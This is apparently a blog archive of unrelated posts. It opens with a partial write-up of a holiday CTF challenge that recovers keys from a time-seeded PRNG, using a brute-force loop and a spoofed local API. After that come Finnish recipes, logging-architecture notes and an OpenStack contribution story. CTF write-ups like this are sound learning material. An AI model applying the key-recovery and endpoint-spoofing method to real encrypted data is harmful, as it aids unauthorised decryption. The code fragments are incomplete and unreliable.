  2. set some crypto vars
  3. call CryptAcquireContext
  4. call generate_key
    1. key goes into eax register I think
  5. call print_hex
  6. more crypto
  7. call CryptImport and CryptEncrypt
  8. call store_key and write_file
  9. call security_check_cookie

Generate_key does:

  1. call time
  2. call super_secure_srand, probably with file,time and seed as args
  3. loop 8 times and call super_secure_random to modify state?
call    ?super_secure_random@@YAHXZ ; super_secure_random(void)
movzx   ecx, al
and     ecx, 0FFh
mov     edx, [ebp+buffer]
add     edx, [ebp+i]
mov     [edx], cl

super_secure_srand does:
something with seed.. really unsure

super_secure_srandom does:
this is doing the rseed, sar, and

The Key Writer


# key examples

# dcd5ed4c2acba87e
# 9f32148fe8ef55a8
# 0d2bac4df0a12e5a
# fa41fb5131993bf5

# like the >> much more than ^

def msvcrt_rand(seed):
    def rand():
      nonlocal seed
      fixed = seed
      keyarray = bytearray()
      for i in range(8):
        #ka = (214013*seed + 2531011)
        fixed = fixed * 0x343fd + 0x269ec3
        key = hex(fixed >> 0x10 & 0x7ffffff)[-2:] # >> sar 16 & is and. We only want the last two bytes - the start look very similar..
        if 'x' in key:
            key = key.replace('x', '0') # because movzx
        key = bytes.fromhex(key)
      return(keyarray) # last two

seed = range(1575658800,1575666001)
# so not off by 1                ^
for rseed in seed:
  two = msvcrt_rand(rseed)

Trying the edit hosts file. As I use WSL I learnt that for .exe files I also need to update window’s hosts file, even though I run it from inside the WSL! Also the syntax is NOT:


Bunch of false positives for some reason… when I use the list of keys I generated and my API and a localhost flask API and hosts file override. Anyway, let this run and used file to stop when it found a pdf, it stopped at 4849 (or 4850th key in keys [] in my python, unsure if that is sorted.. so the creation time might have been 1575663650 ( Friday, December 6, 2019 8:20:50 PM ) :


# the Bruter

for i in $(seq 0 7200); do
  ./elfscrow.exe --decrypt --id=7debfae7-3a16-41e7-b211-678f5ebdce00 ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc out.pdf --insecure
  if [ -f out.pdf ]; then
          isitpdf=$(file out.pdf|grep -c PDF)
          if [ $isitpdf != 0 ]; then
            echo $isitpdf
            echo "GOT IT $i"
            exit 123
            mv -v out.pdf "falses/$i.pdf"

and the

from flask import Flask, json
import os

keys = ["b5ad6a321240fbec", "7200...", "7199", "..."]
api = Flask(__name__)

@api.route('/api/retrieve', methods=['POST'])
def get_companies():
  # store last key tested in a file

  statefile = "/root/elfscrow_status"
  with open(statefile,"r") as r:
    content =
    except ValueError:
      with open(statefile,"w+") as f:

    icontent = int(content)
    ncontent = int(content) + 1
    print("Last was %s, updating to %s" % (icontent, ncontent))

    with open(statefile,"w+") as f:

  return str(keys[ncontent])
  #return json.dumps(companies)

if __name__ == '__main__':

Then to get the key was just a pdf2txt and the 5 word sentence in the beginning of the document!

OK THE ZEEK/BRO Logs is the last one?

The username was found in

Started on this earlier but stopped because I wasn’t feeling it and it was a bit tedious.
Plan: Make the queries programmatically. Also this time check sizes of requests maybe that’s important. Also time when attacks happen could be useful?

let’s try out RITA as indicated in a hint, also found Malcolm while looking up this tool.. could be fun. But at least RITA couldn’t import the http.log :/

weird that the IPs in with the LFI, shellshock etc haven’t posted.. maybe they posted later?

Wow you made it all this way? Prepare for a bit of downer! :)

In the end I ran out of time. End of new year approached and some busy times in January 2020! Turned out I got quite far with a python script, but had too many good IPs in my list I think. In the end I used a JQ solution found in a writeup that is available in the google cache, initially found by searching for the numbers used for the srand function in the elfscrow challenge.

Resepti: Tortellini Casserole

  • 2x tortellini 250g
  • 1x kirsikka tomaatia
  • 1x tomaatia murska yrtejä
  • 1x ruokakerma 10%
  • 1x feta juusto
  • suola ja pippuri

Miksata kerma, tomaatimurska ja mausteet. Kaada sose formille jossa on jo tortellinia ja tomaatia. fetajuusto päällä. Uunille 200 ℃ ~18min.

Versiolle kaksille: ehkä parempi rikottajuusto, penaati ja ilman tomaatimurska?

Resepti: Lapsi Kana & Lohi Porkkana Bataatti

Ota pakasti lohta pakastimesta.

  • 3 bataatia
  • 1 palsternakkaa
  • 3 porkkanaa
  • 1 sopuli
  • 2 valkosipulinkyntä

Laita kaikki kahteen kattilaan. Joka painee noin 800g. Vesimäärä tarvitset on ‘niin paljon että se menee yli ruoan’. Keitä ruoka.

Kun se in valmis laita 400g lohta yhteen kattilaan ja 400g kanaa toiseen.

Resepti: Puuro


3dl vettä ja 3dl maitoa. Vispata ja kun höyry tulee ottaa lämmöt allas. Laitta 4x 3/4dl (12/4 vai 3dl) hiutaleita (esim kaurasta tai neljänviljasta) skuupat. Kun on melkein valmis lämmöt pois ja lautta suola.

Laittaa puuron kulhoihin, laitta voita keskellä ja silloin sokeria.

Tadaa :)

Logging as a Service

Is there an open source thing out there I could use??

So if I only want to use mostly free and open source it there’s a bunch of tools one need to glue together:

These days I’d like to for primary ingestion have a BGP ECMP/anycast for rsyslog receivers. These also run logstash (or beat?). Or maybe one can have a load balancer up front which redirects traffic based on incoming port (and maybe a syslog tag for some ‘authentication’ ? ) to a set of logparsing/rsyslog servers.

These would write to a Kafka cluster.

Then we would need more readers to stream events on to elastic, siems or Hadoop or for example longer term storage engines.

For the as a Service bit I’d like to play with Rundeck and have users configure most of the bits themselves. Logstash grokking/parsing though needs outsourcing too. Fewer rules means more throughput so would be good with different logstash processes for different logs. Could like loggly direct users to ship logs with a tag to get them into the correct lane.

For reading just grafana and kibana should be a good start.

Resepti: Kana Caesar

Croutons : Uniin päällä. Laitta pakastettuna leipä mikroaaltouuniin ja lämmitävät. Leikkaa ja laitaa uunilevylle. Miksata öljyllä ja valkosipulilla. Odottaa.

Majoneesi : 1dl rypsiöljy. Yhden kanamuna (ei rikkitää) ja vähän sinappi. Käytää sauvamixeri(sauvasekoitin on oikea sana) . Laitta pieni kulhoon ja lisätä valkosipulii ja suola.

Salaatti: pieni tomaattia, salaatti, yksi avokaado, 400g kanaafilee vaan suolattu. Paistaa kanaa viimeistä ja kun se on valmis laitta croutonit uuniin muutama minuuttia.

Tarjota parmeggiano pöydällä.

Tadaa :)

Reseptit: Avokado pasta


Ohjeet: Hakata yhden keltainen sipuli. Laita kattilaan öljyllä. Miksata turkalainen jogurtti ja kaksi avokadoa. Suolata runsaasti ja vähän mustapippuria. Laitta vesi päällä spaghetille.

Avokado sipulille. Rakastaa puoli parmeggiano levy ja laitta melkein kaikki kattilaan. Ylimäärä pöydälle.

Puristaa puoli sitruuna kattilaan. Kun on lämmin se on valmis. Viimeistä Spaghetti kattilaan. Tsekkaa jos lisää suola ja pippuri on tarvetavissa.

Resepti: ChilliFetaPasta



  • Fetajuustoa levy 200g
  • 180g spaghetti
  • 1 chilli / habanero
  • ~ 350g tomaattia
  • Oliiviöljy
  • Suola ja Pippuri

Ohjeet :

Laitta uunin päällä 250C astetta. Feta levy uuniformille, tomaattia ympäri sen. Hakkaa chilli ja laitta juuston päällä. Paljon öljy yli kaikki. Suolata ja pipurita :) 25min uunissa.

Kun vesi on 100C laitta suola ja sen jälkeen spaghettin.

Kun tomaattia on rikki ota formmi uunista ja miksata feta ja chilli. Laitta kaikki yhdessä.

Bon App!

Reseptit: Tuorepuuro Mustikalla


  • Maitorahka (pehmeä) 250g
  • Maito 100g
  • Nesteinen Hunaja 6-10g
  • Pakaste Mustikka 100g
  • Kaurahiutaleita 40g
  • 1 laatikko


Laita mustikoita laatikkoon ja odottaa noin tunti. Sen jälkeen laitta kaikki muut ainesosit laatikkoon ja miksata. Huomata että mustikoita eivät menevät liian rikki kuin haluat. Sulje laatiko ja laitta jääkaapiin yli yö.

Nautista aamulla!

Contributing To OpenStack Upstream

Recently I had the pleasure of contributing upstream to the OpenStack project!

A link to my merged patches:

In a previous OpenStack summit (these days called OpenInfra Summits), (Vancouver 2018) I went there a few days early and attended the Upstream Institute .
It was 1.5 days long or so if I remember right. Looking up my notes from that these were the highlights:

  • Best way to start getting involved is to attend weekly meetings of projects
  • Stickersssss
  • A very similar process to RDO with Gerrit and reviews
  • Underlying tests are all done with ansible and they have ARA enabled so one gets a nice Web UI to view results afterward. Logs are saved as part of the Zuul testing too so one can really dig into and see what is tested and if something breaks when it’s being tested.

Even though my patches were one baby and a bit over 1 year in time after the Upstream Institute I could still figure things out quite quickly with the help of the guides and get bugs created and patches submitted. My general plan when first attending it wasn’t to contribute code changes, but rather to start reading code, perhaps find open bugs and so on.

The thing I wanted to change in puppet-keystone was apparently also possible to change in many other puppet-* modules, and less than a day after my puppet-keystone change got merged into master someone else picked up the torch and made PRs to like ~15 other repositories with similar changes :) Pretty cool!

Testing is hard! is one backport I created for puppet-keystone/rocky, and the Ubuntu testing was not working initially (started with an APT mirror issue and later it was slow and timed out)… After 20 rechecks and two weeks, it still hadn’t successfully passed a test. In the end we got there though with the help of a core reviewer that actually updated some mirror and later disabled some tests :)

Now the change itself was about “oslo_middleware/max_request_body_size” So that we can increase it from the default 114688. The Pouta Cloud had issues where our Federation User Mappings were larger than 114688 bytes and we coudln’t update them anymore, turns out they were blocked by oslo_middleware.

(does anybody know where 114688bytes comes from? Some internal speculation has been that it is from 128kilobytes minus some headers)

Anyway, the mapping we have now is simplified just a long [ list ] of “local_username”: “federation_email”, domain: “default”. I think next step might be to try to figure out if maybe we can make the rules using something like below instead of hardcoding the values into the rules

"name": "{0}" 

It’s been quite hard to find examples that are exactly like our use-case (and playing about with is not a priority right now, just something in the backlog, but could be interesting to look at when we start accepting more federations).

All in all, I’m really happy to have gotten to contribute something to the OpenStack ecosystem!